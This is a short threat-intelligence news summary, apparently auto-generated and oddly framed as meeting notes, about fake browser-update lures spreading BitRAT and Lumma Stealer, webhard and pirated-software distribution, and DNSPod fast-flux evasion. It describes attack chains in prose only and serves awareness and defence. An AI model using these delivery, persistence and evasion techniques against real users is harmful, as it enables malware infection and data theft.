June 3, 2024 at 12:00AM
Fake web browser updates are distributing remote access trojans (RATs) and info stealer malware like BitRAT and Lumma Stealer. Cybersecurity firm eSentire reported that attackers use bogus browser update lures to deliver malware. Attack chain involves booby-trapped sites, Discord-hosted ZIP archives, and PowerShell scripts. Threat actors also employ webhards and DNSPod for malware distribution.
Key takeaways from the meeting notes:
– Cybercriminals are using fake web browser update lures to distribute remote access trojans (RATs) and information stealer malware such as BitRAT and Lumma Stealer, including the well-known SocGholish malware.
– The attack chain often starts with users visiting a compromised website with JavaScript code redirecting them to a bogus browser update page. This page contains a link to a ZIP archive file hosted on Discord, leading to the automatic download of the file “Update.zip” onto the victim’s device.
– Threat actors are known to use Discord as an attack vector, with a recent analysis uncovering over 50,000 dangerous links distributing malware, phishing campaigns, and spam.
– The ZIP archive file “Update.zip” contains a JavaScript file (“Update.js”), triggering the execution of PowerShell scripts responsible for retrieving additional payloads, including BitRAT and Lumma Stealer, from a remote server in the form of PNG image files.
– Attacks also involve the use of PowerShell scripts for establishing persistence and a .NET-based loader to launch the final-stage malware. The same loader is used to deploy both BitRAT and Lumma Stealer.
– BitRAT enables attackers to harvest data, mine cryptocurrency, download more binaries, and gain remote control over infected hosts, while Lumma Stealer captures information from web browsers, crypto wallets, and other sensitive details.
– Cybercriminals are leveraging trusted names to maximize reach and impact, using fake browser update lures as a common means of entry to devices or networks. This includes new variants of the ClearFake campaign that trick users into manually executing malicious PowerShell code under the pretext of a browser update.
– Lumma Stealer is identified as one of the most prevalent information stealers, with a rising popularity among adversaries due to its high success rate in infiltrating systems and exfiltrating sensitive data without detection.
– New campaigns have been disclosed that use webhards to distribute malicious installers for adult games, cracked versions of Microsoft Office, and various malware such as Orcus RAT, XMRig miner, 3proxy, and XWorm.
– Additionally, cybercriminals are utilizing websites offering pirated software to deploy malware loaders like PrivateLoader and TaskLoader, which are offered as pay-per-install (PPI) services for other cybercriminals to deliver their own payloads.
– CryptoChameleon is using DNSPod nameservers to engage in fast flux evasion techniques, allowing threat actors to cycle through large amounts of IPs linked to a single domain name, thus evading traditional countermeasures and reducing the operational value of legacy point-in-time IOCs.
These clear takeaways capture the key points from the meeting notes and provide a succinct summary of the cybersecurity threats and tactics discussed.